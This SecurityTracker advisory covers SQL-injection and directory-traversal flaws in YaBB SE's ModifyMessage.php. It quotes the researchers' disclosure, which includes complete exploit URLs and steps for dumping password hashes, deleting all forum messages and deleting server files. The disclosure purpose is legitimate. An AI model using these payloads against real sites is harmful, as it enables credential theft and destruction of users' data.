SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   YaBB SE Vendors:   YaBBSE.org
YaBB SE 'ModifyMessage' Input Validation Holes Let Remote Authenticated Users Delete Information and Files on the Target System
SecurityTracker Alert ID:  1009275
SecurityTracker URL:  http://securitytracker.com/id/1009275
CVE Reference:   CVE-2004-0343, CVE-2004-0344   (Links to External Site)
Updated:  Mar 23 2004
Original Entry Date:  Mar 1 2004
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 1.5.4, 1.5.5, 1.5.5b, and possibly other versions
Description:   Several vulnerabilities were reported in YaBB SE. A remote authenticated user can obtain information from the system and can delete information and files on the target system.

BackSpace (with credit also to Alnitak) reported that there are three vulnerabilities in the 'ModifyMessage.php' file.

It is reported that the user-supplied '$msg' parameter is not validated [CVE: CVE-2004-0343]. A remote authenticated user with knowledge of the database prefix can send the following type of URL to execute SQL commands to obtain usernames and hashed passwords from the database:

http://vulnhost/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,
concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null,null,null,
null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

It is also reported that the ModifyMessage2 function does not validate user-supplied input in the '$postid' parameter [CVE: CVE-2004-0343]. A remote authenticated user can reportedly post the last message, go to the message and select 'modify', and then alter the URL 'action' parameter from 'modify' to 'modify2' and add some new parameters (subject=texto, message=texto y, and waction=deletemodify) and then inject the SQL commands via the 'postid' parameter:

postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*

A demonstration exploit URL to delete all messages in the database is provided:

http://[target]/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*

It is also reported that a similar flaw can be exploited to delete files from the target web server because the '$attachOld' parameter is not validated to remove '..' directory traversal characters [CVE: CVE-2004-0344]. Demonstration exploit steps are described in the Source Message.

Impact:   A remote authenticated user can obtain information from the database (such as usernames and hashed passwords).

A remote authenticated user can delete information stored within the database.

A remote authenticated user can delete files on the target system with the privileges of the web server process.

Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided an unofficial patch, available at:

http://www.elhacker.net/foro/attachments/yabbse1.5.5patch.rar
http://www.trucoswindows.net/Dowmload/yabbse1.5.5patch.rar

Vendor URL:  www.yabbse.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  YabbSE (3 on 1)


Summary
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board).

This time we discovered three new holes. That ranges from extracting
information
to deleting information and files in the remote web server.

Details
Vulnerable Systems:
 * YaBB SE versions 1.5.4, 1.5.5, 1.5.5b possibly others

 The three holes are located in the file ModifyMessage.php

_-= The HOLE =-_

Hole details:
 Extract information from the database.

This hole is located in the ModifyMessage function. In this function
the parameter $msg isn't checked against malicious input, so it's possible
to inject SQL.

 How To Exploit the vulnerability:

1- you need to be a registered user and you need to know the database
prefix.
2- Click any board you see. ex. General Discussion.
3- Click any message. ex Welcome to YaBB SE!
4- Now we can use the "quote" button or look in to the source code
 for the sesc variable.
5-change your url to look like this.

http://vulnhost/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,
%27-%27,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null
+FROM+yabbse_members+where+ID_MEMBER=1/*

Parameters explained:

http://vulnhost/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12[negative
number so no message is returned])+UNION+SELECT+3[MSG ID could be
anything],null,2[our user
ID],concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null,null
,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1[victim's
user ID]/*

That's all

The user's hashed password and his secret question is returned in the form
subject field

like this: e320774659b1b23333bd033754d2ac1a-black color

Why?

the $msg variable isn't checked against malicious input so it's inserted
unchecked
in the SQL sentence.

$request = mysql_query("SELECT m.*, t.locked FROM {$db_prefix}messages AS m,
{$db_prefix}topics AS t WHERE (m.ID_MSG=$msg AND m.ID_TOPIC=t.ID_TOPIC)
LIMIT 1;") or database_error(__FILE__, __LINE__);

with our crafted $msg the sentence looks like this

SELECT m.*, t.locked FROM yabbse_messages AS m, yabbse_topics AS t WHERE
(m.ID_MSG=-12) UNION
SELECT
3,null,2,concat(passwd,'-',secretQuestion),null,null,null,null,1,null,null,n
ull,null,null,null,null
FROM yabbse_members where ID_MEMBER=1/* AND m.ID_TOPIC=t.ID_TOPIC) LIMIT 1;

_-= The HOLE RELOADED =-_

Hole details:
   Delete information from de database

This hole is located in the ModifyMessage2 function. In this function
the parameter $postid isn't checked against malicious input, so it's
possible
to inject SQL.

 How To Exploit the vulnerability:

1- You need to be a registered user and you need to post the last message.
2- Go to your message and push the modify button
3- Now you have something like this in the URL
http://vulnhost/forum/index.php?board=1;action=modify;msg=2;threadid=2;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1
4- Change this action=modify put this action=modify2 and add this 3 new
parameters
subject=texto, message=texto y waction=deletemodify
5- Add the crafted postid: postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
now we have:


http://vulnhost/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify
;postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*

this will delete all messages in the database

Why?

the $postid variable isn't checked against malicious input so it's inserted
unchecked
in the SQL sentence.

	$request = mysql_query("
			SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename,
t.locked, t.ID_FIRST_MSG, t.ID_LAST_MSG, t.ID_TOPIC, t.ID_POLL,
t.numReplies, b.ID_BOARD, b.count
			FROM {$db_prefix}messages AS m, {$db_prefix}topics AS t,
{$db_prefix}boards AS b
			WHERE m.ID_MSG=$postid
				AND t.ID_TOPIC=m.ID_TOPIC
				AND b.ID_BOARD=t.ID_BOARD
			LIMIT 1;"

with our crafted $postid the sentence looks like this

SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename,
t.locked, t.ID_FIRST_MSG,
t.ID_LAST_MSG, t.ID_TOPIC, t.ID_POLL, t.numReplies, b.ID_BOARD, b.count
FROM yabbse_messages AS m, yabbse_topics AS t, yabbse_boards AS b
WHERE m.ID_MSG=1 or 1=1 ORDER BY ID_MSG DESC/* AND t.ID_TOPIC=m.ID_TOPIC AND
b.ID_BOARD=t.ID_BOARD LIMIT 1;

For this to function we need our messages to be the last because we need our
crafted $postid to be
injected in two SQL sentences and that the first sentence return valid data
to pass this check

	if ($row['ID_MEMBER'] != $ID_MEMBER && $settings[7] != 'Administrator' &&
$settings[7] != 'Global Moderator' && !in_array($username, $moderators))
		fatal_error($txt[67]);

After the first sentence is executed and the check is passed this sentence
is executed

$request = mysql_query("DELETE FROM {$db_prefix}messages WHERE
ID_MSG=$postid LIMIT 1;")

wit our crafted $postid we have

DELETE FROM yabbse_messages WHERE ID_MSG=2 or 1=1 ORDER BY ID_MSG DESC/*
LIMIT 1;

this is perfectly legal in MySQL and his consecuence is all messages in the
database
being deleted

_-= The HOLE REVOLUTIONS =-_

Hole details:
   Delete files from the webserver

The third hole is in the same function. This time is a mix of the second bug
and
the parameter $attachOld being unchecked against dotdot ".." subdirectories
traversal .

How To Exploit the vulnerability:

1- You need to be a registered user and has to know your user id.
2- Go to one of your messages and use the "modify" button , or go to any
message and use the "quote" button.

Now you need a tool like Paros or Achilles. You can do another way you want
but with
this tools is really easy. I use Paros.

Check the Trap Request mark.

3- Use preview and go to paros.

change this:

POST /forum/index.php?board=1;action=post2 HTTP/1.0

to this:

POST
/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d
eleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul
l,null,null,null,null,null,null,null,null/* HTTP/1.0

If you get a database error then the file was deleted else you get
a message like this

2:
unlink(C:/xampp/htdocs/yabbse/yabbse155/attachments/../../../../deleteme.txt
): No such file or directory
(C:\xampp\htdocs\yabbse\yabbse155\Sources\ModifyMessage.php ln 319)

Parameters explained:

/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../b
orrame.txt[file to
delete];subject=hola;message=hola;postid=-1+UNION+SELECT+null,3[Our user
ID],null,null,null,null,null,null,null,null,null,null/*

Why?

Why?

the $postid variable isn't checked against malicious input so it's inserted
unchecked
in the SQL sentence.

	$request = mysql_query("
			SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename,
t.locked, t.ID_FIRST_MSG, t.ID_LAST_MSG, t.ID_TOPIC, t.ID_POLL,
t.numReplies, b.ID_BOARD, b.count
			FROM {$db_prefix}messages AS m, {$db_prefix}topics AS t,
{$db_prefix}boards AS b
			WHERE m.ID_MSG=$postid
				AND t.ID_TOPIC=m.ID_TOPIC
				AND b.ID_BOARD=t.ID_BOARD
			LIMIT 1;"

the sentence with our crafted $postid looks like this:

SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename,
t.locked, t.ID_FIRST_MSG, t.ID_LAST_MSG,
t.ID_TOPIC, t.ID_POLL, t.numReplies, b.ID_BOARD, b.count
FROM yabbse_messages AS m, yabbse_topics AS t, yabbse_boards AS b
WHERE m.ID_MSG=-1 UNION SELECT
null,3,null,null,null,null,null,null,null,null,null,null
/* AND t.ID_TOPIC=m.ID_TOPIC AND b.ID_BOARD=t.ID_BOARD LIMIT 1;

m.ID_MSG=-1 is to avoid returned data. And UNION SELECT
null,3,null,null,null,null,null,null,null,null,null,null
is a perfectly legal MySql UNION returning static data the way we want.

Vendor Status:

As in the last bug we sent to YaBBSe developers they didn't anything in a
month to solve this situation and
later they release a one line patch several days after we disclose that
vulnerability, and  because
we don't like their policy of security through obscurity.
We decided not to collaborate with them anymore and release our own patch,

You can download the patch at:

http://www.elhacker.net/foro/attachments/yabbse1.5.5patch.rar
http://www.trucoswindows.net/Dowmload/yabbse1.5.5patch.rar

Credits go to:

    Alnitak and BackSpace



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC